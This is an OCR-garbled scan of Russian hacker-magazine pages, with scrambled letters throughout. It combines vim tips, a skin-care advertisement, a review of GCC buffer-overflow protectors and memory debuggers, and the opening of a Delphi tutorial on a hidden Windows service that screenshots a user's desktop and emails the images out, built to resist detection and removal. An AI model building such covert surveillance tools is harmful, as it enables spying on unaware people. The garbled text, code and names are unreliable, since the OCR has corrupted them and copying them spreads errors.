Ш Положись на ѵіт. Если ты правильно 
настроил редактор, то в награду получишь 
не только подсветку синтаксиса, но и авто- 
матическое создание отступов, что значи- 
тельно повышает читабельность кода. 
Плюс у тебя есть возможность перефор- 
матировать неправильно отформатиро- 
ванный код (очень трудно понять код, напи- 
санный совсем без отступов). Исправит 
положение команда «дд=Ѳ». 

\2\ Очень удобно разбрасывать исходник 
программы по нескольким файлам. Но как 
же их редактировать, если нужно постоян- 
но переключаться между файлами? Очень 
просто, запускай ѵіт такой командой: 



Обзоры камер Сапоп 
РоѵѵегЗНо* А510, Сазіо ЕХІЫМ 
ЕХ-5100, Косіак ЕазуЗИаге 
І.3755, 5опу СуЬег-зИоі: 
Л5С-Р200, Копіса МіпоКа 
ЛУМАХ 7Л, Мікоп СООЬРІХ 
4800. 



В одном флаконе» 

Сравнительный обзор 
фотокамер с лучшими 
возможностями съемки видео. 



И конечно, наш 
суперкаталог» 

Более 200 моделей цифровой 
фототехники с крупными 
иллюстрациями, техническими 
характеристиками, оценками и 
вердиктами. 







$ ѵіт *.С 

Так редактор откроет все файлы с исходни- 
ками, переключаться между которыми мож- 
но с помощью команд «:пехі» и «:ргеѵіоиз». 
[з] Пользуйся автодополнением. Допустим, у 
тебя есть переменная «ѴагіаЫеШІпІ_опдІ\Іате». 
Набивать каждый раз такое длинное имя — 
занятие неблагодарное и утомительное. 
Но автодополнение тебе поможет: набива- 
ешь «Ѵагі», нажимаешь комбинацию 
«Сігі+р», и остальная часть имени перемен- 
ной появляется на экране. 

0 Большой проблемой в объемном коде 
может стать потеря парной скобки. Осо- 
бенно страдают начинающие програм- 
мисты. В ѵіт поиск парной скобки — заня- 
тие обыденное. Надо лишь подвести кур- 
сор к скобке и ввести команду «%». 

0 Что произойдет, если ты забудешь тип пе- 
ременной? Тебе придется возвращаться к 
началу кода и искать объявление этой пе- 
ременной. Зачем так мучиться? Подводим 
курсор к имени переменной, нажимаем 
«СігІ+К и вуаля, мы у объявления перемен- 
ной. Возвращаемся назад нажатием 
«СТгІ+Т». Так можно искать не только пере- 
менные, но и функции. Важное примечание: 
чтобы использовать эту полезную фичу, не- 
обходимо выполнить команду «сіадз» по от- 
ношению к файлу с исходным кодом, напри- 
мер так: 

$ сіадз зоигсе.с 

[б] В языке С есть директива препроцессо- 
ра #іпсіисіе, которая позволяет подключать 
к исходнику заголовочные файлы. Очень 
часто возникает желание заглянуть в один 
из таких файлов ;). Сделать это очень прос- 



то: подводим курсор к имени файла и вво- 
дим команду «дТ». Все! 

Щ Помнится, когда я изучал в школе 
ТигЬоРазсаі, мне очень понравилось, как 
он четко указывал место синтаксической 
ошибки. Еще больше мне понравилось, 
когда ѵіт начал указывать мне ошибки в 
коде на С :). Команда «:таке» запустит 
стандартную одноименную программу, и 
если компиляция не удастся, ѵіт откроет 
бажный файл и установит курсор на место 
ошибки. Естественно, что ошибок может 
быть больше одной. Команда «сі» покажет 
весь их список, переход к следующей 
ошибке — «сп». 

® Как известно, программисты — народ 
очень ленивый и все время пытающийся 
облегчить себе жизнь, перекладывая отве- 
тственность за выполнение всяких рутин- 
ных операций на комп. Создатели ѵіт не 
были исключением и поэтому добавили в 
редактор систему псевдонимов. Работает 
она на манер алиасов из ЬазП'а, а сама 
команда для создания псевдонимов выгля- 
дит так: «іаЫэгеѵ псевдоним строка». При- 
веду несколько примеров (добавь эти 
строки в свой -/.ѵіпгігс): 

іаЫэгеѵ #сі #сІеЯпе 
іаЫэгеѵ #і #іпсІисіе 

іаЫэгеѵ #т іЫ таіп(іпі агдс, сііаг *агдѵ[]) 
іаЫэгеѵ #1 /*<Зрасе>РІХМЕ<Зрасе>7 

Теперь, для того чтобы в тексте программы 
появилась строка «#с1еЯпе», тебе доста- 
точно ввести «#сІ». 

Е Страницы тап очень важны для любого 
ІІ|\]ІХ-программера, это хорошее лекар- 
ство от склероза :). Поэтому в ѵіт есть пла- 
гин для их просмотра. Чтобы воспользо- 
ваться его услугами, тебе необходимо до- 
бавить в свой конфиг строку 

гиЫіте! Йріидіп/тап.ѵіт 

Подведи курсор к имени функции, для ко- 
торой ты хочешь увидеть ман, и выполни ко- 
манду «\К». Нужная страница справки отк- 
роется в отдельном окне. 

Ш Любой программист сталкивается с 
проблемой пустых строк, содержащих 
только пробелы и символы табуляции. Та- 
кие пустышки мешают навигации по коду и 
правильному форматированию. Избавить- 
ся от заразы можно, добавив в конфиг сле- 
дующие строки: 

таісіі ѴѴЫІезрасеЕОІ. Лз\+$/ 
таісіі ѴѴЫіезрасеЕОІ_ / л \ \+/ 

ЫдЫідЫ ѴѴЫІезрасеЕОБ ЫегтЬд=гесІ 

Теперь все пустоты будут подсвечиваться 
красным цветом. 

И Приятно, что ѵіт умеет подсвечивать 
синтаксис не только таких популярных язы- 
ков программирования, как С, Регі, ^ѵа, но 
и менее распространенных и узкоспециа- 
лизированных: Аба, ЕогіИ, Пзр. Более того, 
подсвечиваются даже конфигурационные 
файлы многих популярных программ, сре- 
ди которых арасНе, тиІТ, ТеТсіптаіІ © 

Редактор ѵіт может работать под множеством 
операционных систем, в число которых входит 
I /Ѵіпсіож. Помимо стандартного консольного 
интерфейса, пользователю предоставляются 
и графические шкуры: хі 1, 6ТК+ и др. 
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Весна пришла, господа. Солнышко жарит, 
птички надрываются, девдшки модные 
мини-юбки надели - точно тебе говорим, 
надели. Если оторвешь свой взгляд 
от монитора - сам доидишь. 

Нд а по такомд слдчаю - о смысле о весне 
- тяга к чемд-то этакомд в плане 
противоположного пола появляется 
д всех нормальных мджчин в возрасте 
от 7 до 70. А теперь представь - 
отрываешь ты себя от любимого компа, 
подходишь к зеркалд - и обнаруживаешь 
там не то чтобы Квазимодо напооолам 
с Франкенштейном, но что-то весьма 
недалекое от этого. Отросшая за долгдт 
зимд шевелюра, подбородком можно 
запросто морковку тереть, с лица весь 
бледный, да еще и угри всяческие... 

Ооборов первый шок и желание зайиться 
под стол до конца жизни, включай первую 
космическую скорость и срочно дуй 
в аптеку или |в магазин - за правильными 
средствами для ухода за своим лицом, 
которое - лицо - нужно срочно приводить 
в норму. Сорашивай у продавца новую сулер- 
пуперскую серит специально для молодых 
мужчин - СІеагазіІ Тог теп называется. 
Почему ее? Во-первых, тебе нужно срочно 
вернуть уверенность в своей 
неотразимости - а в этом Клерасил спец: 
вспомни, как в подростковом возрасте он 
помогал тебе избавиться от страшного 
кошмара на лице - прыщей и воспалений. 

А во-вторых, в ней, натурально, 
есть все нужные тебе для ежедневного 
ухода средства - эффективные, приятные 
и просто клевые. 



или Будь ГОТОВ 



# ДЛЯ СУПЕРБРИТЬЯ 



Например, Гель для бритья (есть и для нормальной, и для склонной 
к раздражению кожи) пенится, как зверь, так что бритва ходит как по маслу, 
и кожу потом не дерет, а главное — прыщи не появляются. Ведь когда бре- 
ешься с обычным гелем, срезаешь эти угри бритвой, а они по-новой воспа 
ляются — просто замкнутый круг какой-то. Но Клерасил нашел выход — 
в его Геле есть хитрый антибактериальный спецкомпонент против пры- 
щей, так что ни одна особа женского пола не сможет отказать в поцелуе 
по причине твоей повышенной прыщавости или колючести. 




Ш ДЛЯ БОДРОСТИ 



Другое чудо чудное — 

Бодрящая пенка 
с хрустящим эффектом: на- 
звание, конечно, смешное, но ре- 
зультат классный — пенка, впи- 
тываясь в кожу, делает ее мяг- 
кой и приятной на ощупь, 
но при этом здорово бодрит. 
Пенка эта хрустит как свежий 
снег и лопается, как мыльные 
пузыри, а от запаха все 
девушки будут просто млеть, 
ч __ 



^ ДЛЯ УВЛАЖНЕНИЯ 



Если кожа после бритья 
сильно сохнет — исполь- 
зуй для более мощного 
увлажнения и защиты от 
красноты Бальзам после 
бритья. Он отлично 
успокаивает кожу 
на целые сутки и даже 
заживляет ее повреж- 
дения. 





*> ДЛЯ ДУША 



Теперь займись телом. Тут для экономии 
твоего времени и финансов есть класс- 
ное средство — Шампунь- 
гель для пуша и умывания 

3 в 1 из той же серии: 
им можно и голову помыть, 
и лицо очистить, и самому 
вымыться. Вот уж точно 
3 в 1 — флакон-то один, ] 
просто, как говорится, 
ничего лишнего! И тоже, 
кстати, от прыщей защи- 
щает намертво. 




* ДЛЯ УМЫВАНИЯ 



Если же раздражения от бритья 
у тебя не бывает, а вот прыщи 
появляются с печальной регу- 
лярностью — умывайся каж- 
дый день Тонизирующим 
гелем для умывания, 
и чистое лицо гарантирова- 
но. А еще в Геле есть ментол, 
и он, как в жвачке, приятно 
холодит кожу — ощущения 
улетные! 




Да, самое главное: если ты от прыщей защититься не успел и уже пострадал 
дальше некуда, захвати в аптеке или магазине самую модную и эффектив^ 
ную новинку — Крем от угревой сыпи Клерасил Ультра. Это самый 
быстрый из всех быстродействующих кремов, действительно ультра: 
ежедневно, очистив лицо, наносишь на прыщи этот крем — и ровно через 
три дня ты увидишь реальный результат: прыщи исчезают! 




И поверь - это не туфта, это проверенно действует. Так что если хочешь этой весной 
обниматься не с компом, а с кем-то посимпатичней и женского попа - спутай стда, 
и все у тебя будет кпево. Как у нас. 




ЮНИТЫ КРЕАТИФФ КОДИНГ УШХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВПІІМ НЬЮСЫ 





Бравые 

помощники 

компилятора 



ВРЕМЕНА, КОГДА КОМПИЛЯТОРЫ 
КОМПИЛИРОВАЛИ, А ПРОГРАММИС- 
ТЫ ПРОГРАММИРОВАЛИ, УЖЕ ДАВНО 
ПОЗАДИ. СОВРЕМЕННЫЙ КОМПИЛЯ- 
ТОР — ЭТО МОГУЧИЙ ИНСТРУМЕНТ, 
СОВМЕЩАЮЩИЙ В СЕБЕ ФУНКЦИО- 
НАЛЬНОСТЬ КУХОННОГО КОМБАЙНА 
СО СТРЕМИТЕЛЬНОСТЬЮ ПИКИРУЮ- 
ЩЕГО БОМБАРДИРОВЩИКА. КОГДА 
ЖЕ ЕГО ВОЗМОЖНОСТЕЙ ОКАЗЫВА- 
ЕТСЯ НЕДОСТАТОЧНО, НА ПОМОЩЬ 
ПРИХОДИТ МНОЖЕСТВО ПОЛЕЗНЫХ 
(И НЕ ОЧЕНЬ ПОЛЕЗНЫХ) УТИЛИТ, ОТ 
ИЗОБИЛИЯ КОТОРЫХ НАЧИНАЕТ РЯ- 
БИТЬ В ГЛАЗАХ. КАК ЖЕ ВЫБРАТЬ ИЗ 
ВСЕГО ЭТОГО ХЛАМА ДЕЙСТВИТЕЛЬ- 
НО НУЖНОЕ? I Крис Касперски ака мыщъх 



Обзор примочек для ѲСС 

[у разбитого корыта] Нет нужды говорить, 
что языки Си и Си++ не для прикладников. 
Это не Паскаль, складывающий строки так 
же, как и остальные типы данных, и не Ада 
с ее поддержкой динамических массивов 
и встроенным контролем границ. Идеоло- 
гию Си хорошо выражают слова японско- 



го мультипликатора Миядзаки Хаяо: 
«Стоит ли использовать компьютер 
для того, что можно сделать рука- 
ми?». Обо всех проверках Си-прог- 
раммист должен заботиться самос- 
тоятельно, и если хоть однажды он об 
этом забудет (или допустит небреж- 
ность), последствия в виде неста- 
бильной работы, червей или утечек 
памяти не заставят себя ждать. 
Казалось бы, не умеешь програм- 
мировать на Си — выбирай другой 
язык, например Яву или Фортран. 
Так ведь нет, не хотят! Упрекают соз- 
дателей Си в кретинизме, но с него 
не слезают. Попытки исправить 
язык, добавив в него, например, ав- 
томатический сборщик мусора, 
предпринимались неоднократно. 
Дружелюбно настроенные прог- 
раммисты предлагают не трогать 
язык, оставив Си/Си++ таким, какой 
он есть (руки прочь! пасть порву!), 
но изменить компилятор, заставляя 
его внедрять проверочный код пос- 
ле каждой потенциально небезо- 
пасной операции. Еще предлагают 
переписать все стандартные биб- 
лиотеки, научив их распознавать на- 
иболее характерные ошибки расп- 
ределения памяти... Расплатой за 
это становится значительное паде- 
ние производительности, что просто 
недопустимо. 

Статические анализаторы все про- 
верки выполняют до компиляции, 
обращая внимание программиста 
на все неблагонадежные места, 
которые могут привести к пробле- 
мам. Пусть сам решает, как их исп- 
равить. К сожалению, возможности 
статических анализаторов очень 
ограничены, и многим ошибкам 
удается ускользнуть. 

сітаііос.сот 
ѵѵѵѵѵѵ.сідііаІ.сот/іЫ 
тѵѵ.орептІІ.сот/Ііпих 
іііііі.бііЬееІег.сот/ШііТтбег 
тап\и.с8.ЬегкеІеу.е6и/ссиге6 
тѵѵ.ІіпксІаіа.8е/8оигсесос1е.ІіітІ 
шшѵѵ.дпи.огд/зоПшаге/сІіескег/сІіескег.РітІ 
тѵѵ.сзе.оді.есІи/ОІЗС/ргоіесіз/іттипіх/ЗіаскбиагсІ 



В общем, не ситуация, а одно разби- 
тое корыто. С ошибками лучше всего 
справляться своей собственной го- 
ловой, используя компилятор и при- 
мочки к нему как дополнительный 
уровень обороны. Сработает - хоро- 
шо, не сработает — что ж поделать. 
Вот о примочках к компиляторам мы и 
будем говорить. Их можно разделить 
на две категории: средства противо- 
хакерской защиты, предотвращаю- 
щие переполнения буфера (а вместе 
с этим и засылку зНеІІ-кода), и детек- 
торы ошибок распределения памя- 
ти, удерживающие программу от ухо- 
да вразнос. Все описываемые утили- 
ты, во-первых, бесплатны, а во-вто- 
рых, не зажимают исходные тексты. 

[хакеры под прицелом] Переполне- 
ния буфера чаще всего возникают не 
где-нибудь, а в строго определенных 
местах, которыми, как правило, явля- 
ются следующие функции: зігсруО, зіг- 
саКХ деізО, зргіпіЮ/ семейство функ- 
ций зсапЮ/ (ѵИЛргіпіЮ, МзпрппЩ) и 
зузІодО. В девяти из десяти случаев 
передача управления на зПеІІ-код 
осуществляется путем подмены ад- 
реса возврата из функции. Осталь- 
ные способы приходятся на модифи- 
кацию индексов, указателей и прочих 
типов переменных. Причем перепол- 
нение буфера, как правило, происхо- 
дит последовательно, то есть затира- 
ется непрерывный регион памяти. Ин- 
дексное переполнение, при котором 
затирается несколько ячеек далеко 
за концом буфера, носит эпизоди- 
ческий характер и большой опаснос- 
ти не представляет. 

Это сужает круг «подозреваемых» и 
значительно упрощает задачу конт- 
роля над буферами. Существует 
множество утилит, предотвращаю- 
щих (или, во всяком случае, пытаю- 
щихся предотвратить) переполнения. 
Вот только некоторые из них... 

[З+аск ѲиагсІ] Вероятно, самый удач- 
ный и самый популярный антихакерс- 
кий протектор, представляющий со- 
бой заплатку для 0СС, модернизиру- 





[сайт статического анализатора РІаѵѵІіпсІег] 





ющую машинный код пролога (Иіпс- 
ііогцэгоіод) и эпилога (1ъіпсііоп_рго- 
Іод), вставляемый компилятором в на- 
чало и конец каждой функции. При 
входе в функцию поверх адреса возв- 
рата устанавливается чувствитель- 
ный индикатор (он же сапагу-\л/огс1), 
неизбежно затираемый хакером при 
последовательном переполнении. 
Перед выходом из функции сапагу- 
\л/огсІ сверяется с оригиналом, храня- 
щемся в недосягаемом для хакера 
месте, и если его целостность ока- 
жется нарушенной, программа со- 
общит, что ее взломали, и мирно отва- 
лит, устроив себе настоящий Эо$ (от- 
каз в обслуживании). 

Для предотвращения подделки 
чувствительного детектора Зіаск 
ѲиагсІ предпринимает целый ряд 
мер. Сапагу-\л/огсІ представляет со- 
бой комбинацию из четырех симво- 
лов-завершителей (0x00000000 1_, СВ, 
І_Р и РРИ), которые большинство функ- 
ций воспринимает как завершитель 
ввода, и случайной привязки, считы- 
ваемой из устройства /сіеѵ/игапсіопп 
или генерируемой на основе теку- 
щего времени, если /сіеѵ/игапсіопп 
недоступно. Этот прием защищает 
лишь от последовательных перепол- 
нений, да и то не от всех, и бессилен 
против индексных. 

При необходимости Зіаск ѲиагсІ мо- 
жет запрещать модификацию адре- 
са возврата на время выполнения 
функции, что существенно усилива- 
ет защищенность, но вместе с тем 
роняет производительность (сапагу- 
\л/огб быстродействия практически 
не сокращает). К тому же, для реа- 
лизации данного механизма требу- 
ется определенная поддержка со 
стороны ядра, а в большинстве ядер 
ее нет. 

[РгоРоІісѳ] Для предотвращения атак 
срыва стека (ЗРаск ЗтазПіпд АРРаск) 
на основе ЗРаск ѲиагсІ одним японс- 
ким кодером из ІВМ был создан 
РгоРоІісе (ЗРаск РгоРесРог) — патч для 
ѲСС, с помощью которого переопре- 
деляются объявления локальных пере- 



менных и добавляются дополнитель- 
ные проверки во время выполнения 
программ. При обнаружении пере- 
полнения проблемный процесс лик- 
видируется, и в системный журнал 
производится запись типа «зРаск 
оѵегРІо\л/ іп РипсРіоп XXX». В настоящее 
время РгоРоІісе по умолчанию вклю- 
чен в ТгизРесІ ЭеЫап и ОрепВЗЭ. 

[неисполняемый стек] Специальный 
патч от Зоіаг Эезідпег'а, встраивается в 
Линуховое ядро, делая стек неиспол- 
няемым. Переполняющиеся буфера 
по-прежнему будут приводить к краху 
приложения, но непосредственная 
передача управления на зПеІІ-код ста- 
новится невозможной, точнее, воз- 
можной, но очень трудно реализуе- 
мой (подробности в статье «ЭеРеаРіпд 
Зоіаг Эезідпег'з Ыоп-ехесиРаЫе ЗРаск 
РаРсН», выложенной на сервере 
ѵѵѵѵѵѵ.іпзесиге.огд/зріоііз/поп-ехе- 
сиіоЫе.зіоск.ргоІэІетз.ІіітІ ) . 

Это не снижает производительности 
и не требует перекомпиляции суще- 
ствующих приложений, но на универ- 
сальное решение, увы, не тянет. Зап- 
латки доступны только для старых 
версий ядер (2.0, 2.2, 2.4), да и все- 
возможных конфликтов предостаточ- 
но. Тем не менее, полностью отказы- 
ваться от идеи неисполняемого сте- 
ка все же не стоит. 

[ІТ34 5оРР\л/аге ЗесигіРу ТооІ] Статичес- 
кий анализатор исходных текстов, 
нацеленный на поиск переполняю- 
щихся буферов и некоторых других 
ошибок. Отмечает вызовы потенци- 
ально опасных функций, таких, нап- 
ример, как зТгсру/тетсру, и вы- 
полняет поверхностный семанти- 
ческий анализ, пытаясь оценить, 
насколько опасен такой код, а так- 
же дает советы по его улучшению 
(в большинстве своем либо слиш- 
ком очевидные, либо откровенно 
глупые). Поддерживает приплюс- 
нутый и обычный диалекты Си. 
Представляет собой утилиту кома- 
ндной строки, работающую как на 
\Л/іпсІо\л/5, так и на *піх. 




[РІа\л/ИпсІег] Простой статический анализатор исход- 
ных текстов, написанных на языках Си и Си++. Пытает- 
ся обнаружить ошибки переполнения, но как же неу- 
мело он это делает! Вместо семантического анализа 
кода нам предлагают простой шаблонный поиск. 
РІамЯпсІег обращает внимание лишь на имя функции 
(зігсру, зігсаі и т.д.) и аргументы, переданные ей 
(константная строка или указатель на буфер), оцени- 
вая потенциальную опасность в условных «хитах». Тем 
не менее, полезен для получения общих представле- 
ний о программе, особенно чужой. 




[что-то с памятью моей стало] Проблемы с распреде- 
лением памяти в основном относятся к чистому Си. В 
плюсах имеется множество механизмов для их реше- 
ния. Конструкторы и деструкторы, перекрытие опера- 
торов, объекты с ограниченной зоной видимости — 
все это ликвидирует часть ошибок из серии «выделил 
память и забыл ее освободить». С другой стороны, бо- 
лее сложная семантика Си++ существенно затрудня- 
ет статический анализ, вынуждая прибегать к гип-ііте 
контролю, осуществляемому непосредственно на 
стадии исполнения, что несколько снижает произво- 
дительность. 

Большой популярностью пользуются отладочные 
версии библиотек, осуществляющие жесткий конт- 
роль за динамической памятью (она же — Беар, ку- 
ча) и обнаруживающие большое количество труд- 
ноуловимых ошибок, с которыми раньше приходи- 
лось справляться лишь многодневной отладкой без 
перерыва на сон и еду. По соображениям произво- 
дительности они обычно используются лишь на ста- 
дии разработки и альфа-тестирования, а из финаль- 
ной версии исключаются. 



[проект Зоіаг Оезідпег'а] 



[ХАКЕР 04 [76] 05 105 ] 




[хакер 04 [76] 05 106 ] 



[РАЗБОРКИ 
С ДИНАМИЧЕСКОЙ 
ПАМЯТЬЮ] 

Постоянная проверка успешности 
выделения памяти, во-первых, 
слишком утомительна, во-вторых, 
загромождает исходный текст, и 
в-третьих, приводит к неоправдан- 
ному увеличению объема отком- 
пилированного кода программы. 
Одно из возможных решений 
проблемы сводится к созданию 
обертки вокруг интенсивно ис- 



пользуемых функций, проверяю- 
щих успешность их завершения и 
при необходимости рапортующих 
об ошибке с завершением прог- 
раммы или передающих управле- 
ние соответствующему обработчи- 
ку данной аварийной ситуации. 
Можно пойти и дальше, заставив 
функцию-обертку возвращать ука- 
затель на указатель. Это позволит 
дефрагментировать динамичес- 
кую память — конечно, при усло- 
вии, что адресация блоков всегда 



будет идти через базовый указа- 
тель, который будет постоянно 
перечитываться из памяти (чтобы 
компилятор не скэшировал его в 
регистре, указатель должен быть 
объявлен как ѵоіа/ііе). Как вари- 
ант — можно защитить программу 
критическими секциями, чтобы 
блок памяти не был перемещен во 
время работы с ним. И то, и дру- 
гое снижает производительность, 
а потому выглядит отнюдь не бес- 
спорным решением. 



[ССыгесІ] Сишный протектор, защищающий программу от проб- 
лем с распределением памяти (выход за границы буфера, ис- 
пользование неинициализированных указателей и т.д.) и работа- 
ющий по принципу 5оигсе2зоигсе транслятора, заглатывающего 
сырой исходный текст и вставляющего дополнительные проверки 
в различных местах. То есть вместо того чтобы исправить ошибки, 
он загоняет их подальше вглубь! Своеобразный предохранитель- 
ный клапан, удерживающий программу от ухода вразнос и пре- 
дотвращающий ряд удаленных атак, основанных на передаче 
зОеІ 1-кода. Но вот отказ в обслуживании злоумышленник устроить 
вполне может. К тому же, дополнительные проверки ощутимо за- 
медляют быстродействие программы (от 10% до 60% в зависимос- 
ти от качества исходного кода). 

Маленькие программы транслируются автоматически, но в 
серьезных проектах над текстом, выданным ССгиесГом, прихо- 
дится как следует поработать (то есть ССгиесІ не только лечит 
программы, но и портит!). Тем не менее, процесс послеродовой 
реабилитации защищенного листинга описан достаточно под- 
робно, и разработчикам ССигесГа удалось переварить исход- 
ные тексты ЗепсІтаіГа, ВіпсГа, ОрепззІ, АрасГіе и других прило- 
жений, потратив на каждое из них по несколько дней. А гип-ііте 
контроль, реализованный в ССигесІ, намного надежнее стати- 
ческого анализа. 

[Мет\л/аТсІп] Набор отладочных функций для определения оши- 
бок распределения памяти, поставляющийся в исходных текстах. 
Состоит из заголовочного файла тетѵѵаісіі.іі и ядра 
тетѵѵоісіі.с, написанных на АІЧЗІ С, что обеспечивает совмести- 
мость со всеми нормальными компиляторами и платформами 
(разработчики заявляют о поддержке РС-Ііпі 7.0к, Місгозо// ѴізиаІ 
С++ (как 16-, так и 32-разрядные версии), Місгозо// С для ЭОЗ, ЗАЗ 
С для Атіда 500, 0СС и некоторых других). Поддержка Си++ на- 
ходится в зачаточном состоянии. 

Стандартные функции распределения памяти 0 таііос , геаііос, /гее) 
оборачиваются в отладочную обертку, отслеживающую утечки памя- 
ти, двойное освобождение указателей, обращение к неинициализи- 
рованным указателям и выход за пределы выделенного блока памяти. 
Создается некоторое количество сторожевых блоков, отлавливаю- 
щих дикие указатели, обращающиеся к невыделенным областям па- 
мяти. Все обнаруженные ошибки записываются в журнал. Макросы 
А55ЕТ и ѴЕРІЕѴ заменяются их продвинутыми версиями, вместо немед- 
ленного завершения сбойнувшей программы предлагающие пользо- 
вателю стандартный набор действий: АЬог/-Ре/гу-Ідпоге. 




[Домашняя страница СНескег] 




[Домашняя страница ОтаІІос] 

Платформенно-зависимая часть кода разработчиками не реали- 
зована, и функции типа т\л/І5РеасІАсІсІг/т\л/І5$а/еАсІск каждый вы- 
нужден дописывать самостоятельно. Другой серьезный недоста- 
ток — программа должна быть явным образом подготовлена для 
работы с Мет\л/аісИ, что в ряде случаев неприемлемо. Многопо- 
точность поддерживается лишь на рудиментном уровне, и когда 
она будет реализована в полном объеме — неизвестно. 

[ЭтаПос — ЭеЬид МаІІос ЫЬгагу] Отладочная версия библиоте- 
ки для работы с памятью, замещающая собой штатные функ- 
ции языка Си: таііос, геаііос, саііос, /гее и др. Вносить измене- 
ния в исходный код приложения при этом не требуется, хотя 
при желании проверки распределения памяти можно осущес- 
твлять и явно. 

Сервис, предоставляемый сітаііос'ом, вполне стандартен для 
утилит этого класса: утечки памяти, выход за границы буферов, 
статистика и логгинг с указанием номеров строк и имени файла. 
При включении проверок на каждую операцию ужасно тормозит, 
так что для работы потребуется по меньшей мере Реп/іит- 
4/Ргезсо//. 

Работает практически во всех операционках. Сложным обра- 
зом конфигурируется и требует предварительной подготовки с 
докой в руках, что не есть плюс. Зато полноценно поддержива- 
ет многопоточность, которой могут похвастаться далеко не все 
его конкуренты. 

[С/тескег] Еще одна отладочная библиотека, предлагающая 
свою реализацию функций таііос, геаііос и /гее. Ругается всякий 
раз, когда /гее или геаііос принимают указатель, полученный не от 
таііос, отслеживает повторное освобождение уже освобожден- 
ных указателей и обращения к неинициализированным областям 
памяти. Откладывает реальное освобождение блоков памяти на 
некоторое время, в течение которого пристально следит, не про- 
исходит ли к ним каких-нибудь обращений. Содержит детектор 
мусора, вызываемый либо из отладчика, либо непосредственно 
из самой исследуемой программы. В общем, простенько, но со 
вкусом. К тому же, практически без ущерба для производитель- 
ности системы. Работает в паре с компилятором 0ІЧІІ, на других 
не проверял. 

[заключение] Количество примочек к 0СС и другим компилято- 
рам растет с каждым днем. Часть из них умирает, часть растворя- 
ется в 0СС. Что еще вчера было отдельным проектом, завтра мо- 
жет быть интегрировано с 0СС. Поэтому, прежде чем искать нуж- 
ную утилиту в Сети, имеет смысл поинтересоваться, нет ли чего-то 
похожего в компиляторе © 
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Эеірілі 

Видеошпион 

ВО МНОГИХ КОМПАНИЯХ, ГДЕ РАБОТА ИДЕТ 
ПРЕИМУЩЕСТВЕННО ЗА КОМПЬЮТЕРОМ, 
АДМИНЫ ЛЮБЯТ УСТАНАВЛИВАТЬ 
НА МАШИНЫ СОТРУДНИКОВ ИНТЕРЕСНУЮ 
ПРОГРАММУ: СЕРВИС ВИЗУАЛЬНОГО НАБ- 
ЛЮДЕНИЯ. ОНА ВИСИТ В ПАМЯТИ И ЗАПИ- 
СЫВАЕТ ВСЕ, ЧТО ПРОИСХОДИТ НА РАБО- 
ЧЕМ СТОЛЕ ПОЛЬЗОВАТЕЛЯ. ЕСЛИ ВДРУГ 
ЮЗЕР РЕШИЛ ВМЕСТО РАБОТЫ ПОИГРАТЬ 
В САПЕРА, МЕНЕДЖЕР ЭТО МГНОВЕННО ЗА- 
МЕТИТ И ДАСТ ГЕЙМЕРУ ПО УШАМ. ТАКОЙ 
СПОСОБ СЛЕЖЕНИЯ НАВЕРНЯКА ПРИГО- 
ДИТСЯ ХАКЕРУ, КОТОРОГО ДОЛЖНО УЖЕ 
ТОШНИТЬ ОТ ТЕКСТОВЫХ ЛОГОВ ОБЫЧНЫХ 
5РѴѴѴАВЕ-УТИЛИТ I дГЮ5Т (дШбШуапсІех.ги) 

Лепим сервис визуального 
наблюдения 



В этой статье мы разберемся, как написать программу-видеош- 
пион — сервис, который будет периодически снимать с рабоче- 
го стола пользователя скриншот и отправлять его на мыло (как ва- 
риант — сохранять на диск). В принципе, в том, чтобы снять, сжать 
и отправить, большой сложности нет. Но вот устройство сервисов — 
штука уже не такая простая, и ей придется уделить особое вни- 
мание. Почему именно сервис? Ну во-первых, так принято ;). Во- 
вторых, сервис не даст себя убить простому смертному пользо- 
вателю. И в-третьих, он не будет нагло висеть в автозагрузке, а за- 
лезет очень далеко и глубоко. Поэтому, чтобы обнаружить его и 
обезвредить, придется поднапрячься. 

[трепанация] Раз уж мы собрались писать шпион в виде сервиса, 
сначала мы должны разобраться, что он из себя представляет. 
Итак, сервис, или, как его любят называть разработчики винды, 
служба, — это исполняемый файл РЕ-формата, то есть экзешник. От 
обычного приложения его отличает особая начинка. Каждый сер- 
вис должен состоять как минимум из трех специальных функций: 

Ш Маіп-функция. Главная функция, вызываемая при запуске, — как 
у всех исполняемых файлов. В ней мы, прежде всего, сообщаем 
системе, что данный файл содержит код не обычной программы, а 
службы. Для этого мы вызываем функцию ЗГагГЗегѵісеСГгЮізраГсГюг 
и передаем ей структуру типа Зегѵісе_ТаЫе_ЕпГгу, в которой опи- 
сано имя сервиса и указатель на его ЗегѵісеМаіп-функцию. 

[таіп-функция нашего шпиона] 

□ізраІсііТаЫе.ІрЗегѵісеМате:='Оиг зегѵісе 1 ; 

ОізраісГіТаЫе.ІрЗегѵісеРгос:=@ЗегѵісеМаіп; 

ЗіагіЗегѵісеСігЮізраісІіег(0і5раісГіТаЫе); 

ЩЗегѵісеМаіп-функция. На этом участке кода будет происходить 
инициализация и вся основная работа нашего шпиона. О нем 
нам еще предстоит поговорить ниже. 

[з] НапсІІег-функция. Предназначена для обработки системных 
событий типа запуска, паузы или остановки сервиса. В качестве 
параметра система передает ей сообщение об изменении сос- 
тояния сервиса. Все типы сообщений я описывать не буду, их 
можно взять в МЗЭІЧ скажу лишь о 5ЕВѴІСЕ_СОМТВОІ__ІМТЕВІЮ- 
ѲАТЕ. Это сообщение самое важное и требует немедленно возв- 
ратить текущий статус сервиса, используя ЗеГЗегѵісеЗГаГиз. Даже 
если мы забьем на всякие функции типа остановки сервиса, это 
сообщение обрабатывать все равно придется. 

[ІеГ$ сосіе!] Зная основу анатомии сервисов, можно приступить к 
кодингу. Хочу заметить, что, как правило, сервисы — это консоль- 
ные приложения, а значит, писать мы будем непосредственно в 
коде проекта. В связи с этим можешь смело удалять из проекта 
все юниты, вычищать секцию изез и весь код между Ьедіп и епсі. 
Правда, совсем без модулей мы далеко не уедем, так что добавляй 
в секцию изез ѴѴіпсІо\л/5 и ѴѴіпЗѵс, чтобы была возможность пользо- 
ваться стандартными виндовыми функциями, константами и типами. 
Также понадобятся несколько глобальных переменных. Для реги- 
страции сервиса в главной функции — ОізраГсГіТаЫе типа 
Зегѵісе_ТаЫе_Еп1ту. Для описания текущего статуса сервиса — 
МуЗегѵісеЗГаГиз типа ЗЕРѴІСЕ_5ТАТІІЗ. А для обращения к сервису 
— его хэндл в переменной ЗегѵісеЗГаГизНапсІІе типа 5ЕРѴІСЕ_5ТА- 
ТІІ5_НАІ\ЮІ_Е. 

